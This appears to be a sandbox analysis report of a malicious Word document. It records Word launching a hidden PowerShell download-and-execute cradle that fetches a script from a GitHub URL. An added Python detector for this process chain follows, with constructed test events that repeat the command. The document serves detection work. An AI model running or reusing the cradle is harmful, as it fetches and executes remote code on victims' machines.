Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13fc80000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                            General

Start time: 01:49:18
Start date: 04/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Imagebase: 0x13f590000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp, Author: Florian Roth
Reputation: high
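Detection logic for the process chain above (WINWORD.EXE spawning powershell.exe with the -NoP -NonI -W Hidden -Exec Bypass combination the PowerShell_Susp_Parameter_Combo Yara rule flagged, plus the IEX/DownloadString cradle), as an added Python example that is not from the report and not the Yara rule it cites. The process-creation records are constructed, the first reproducing the report's command line; the prefix table encodes the assumption that powershell.exe accepts the unambiguous switch abbreviations shown (and the common -ep alias), and the scoring thresholds are this example's own.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts unambiguous prefixes of its switch names, which is why
# "-NoP -NonI -W Hidden -Exec Bypass" works. The minimum prefixes below are an
# assumption chosen to avoid collisions ("-no" could also mean -NoLogo or -NoExit);
# "ep" is handled as the widely used alias of -ExecutionPolicy.
PARAMS = {
    "noprofile": "nop",
    "noninteractive": "noni",
    "windowstyle": "w",
    "executionpolicy": "ex",
    "encodedcommand": "e",
}
ALIASES = {"ep": "executionpolicy"}

CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|net\.webclient|start-bitstransfer", re.I)
INLINE_EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)


def canonical_param(token):
    """Map a switch token such as -NoP, -W or -Exec to its full parameter name, or None."""
    t = token.lstrip("-").lower()
    if t in ALIASES:
        return ALIASES[t]
    for full, minimum in PARAMS.items():
        if full.startswith(t) and t.startswith(minimum):
            return full
    return None


def powershell_flags(cmdline):
    """Return the set of evasive launch options present in a powershell command line."""
    toks = cmdline.split()
    flags = set()
    for i, tok in enumerate(toks):
        if not tok.startswith("-"):
            continue
        name = canonical_param(tok)
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if name == "windowstyle" and nxt == "hidden":
            flags.add("hidden_window")
        elif name == "executionpolicy" and nxt in ("bypass", "unrestricted"):
            flags.add("exec_bypass")
        elif name in ("noprofile", "noninteractive", "encodedcommand"):
            flags.add(name)
    return flags


def analyze(event):
    """Return the sorted list of finding names for one process-creation event."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    findings = set()
    if parent in OFFICE_PARENTS and image in SHELLS:
        findings.add("office_spawns_shell")
    if image in ("powershell.exe", "pwsh.exe"):
        flags = powershell_flags(cmd)
        # Heuristic (this example's own): hidden window together with a policy
        # bypass, or any three evasive options at once, is the parameter combo
        # worth alerting on; a lone -NoProfile is routine in admin scripts.
        if {"hidden_window", "exec_bypass"} <= flags or len(flags) >= 3:
            findings.add("susp_param_combo")
        if CRADLE_RE.search(cmd):
            findings.add("download_cradle_inline_exec" if INLINE_EXEC_RE.search(cmd)
                         else "download_cradle")
    return sorted(findings)


# Constructed process-creation records; the first reproduces the chain in the report.
EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient)"
                     ".DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-ChildItem $Env:Temp"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ep bypass -w hidden -enc SQBFAFgA"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["command_line"][:60], "->", analyze(ev) or ["clean"])
```

Matching on canonical parameter names rather than on the literal strings -NoP or -W Hidden is what keeps the rule from being trivially evaded by -NoPr or -Win Hidden, which powershell.exe accepts just as readily; the parent-process check is independent of the command line, so an Office process spawning a shell still fires even when the command line is encoded.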

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis
